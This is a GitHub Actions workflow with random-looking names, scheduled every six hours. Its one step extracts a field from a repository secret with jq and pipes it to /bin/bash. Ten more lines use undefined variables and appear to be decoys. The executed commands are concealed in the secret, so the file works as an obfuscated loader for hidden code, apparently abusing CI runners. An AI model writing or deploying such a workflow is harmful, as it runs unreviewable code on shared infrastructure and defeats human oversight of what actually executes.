name: luanyunping2345
on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luanyunping2345
        env:
          in8646: ${{ secrets.in8646 }}
        run: |
          echo $in8646 | jq -r .dgl12964 | /bin/bash
          echo $nb854 | jq -r .ovmo86 | /bin/bash
          echo $yeqx475 | jq -r .fkxot7768 | /bin/bash
          echo $elv81544 | jq -r .cku93 | /bin/bash
          echo $h8 | jq -r .wum83351 | /bin/bash
          echo $gchxb518 | jq -r .ru62 | /bin/bash
          echo $tt80 | jq -r .piye92970 | /bin/bash
          echo $does2 | jq -r .z8 | /bin/bash
          echo $ra28 | jq -r .u67135 | /bin/bash
          echo $dd6 | jq -r .attab5827 | /bin/bash
          echo $yc14356 | jq -r .sogw5 | /bin/bash

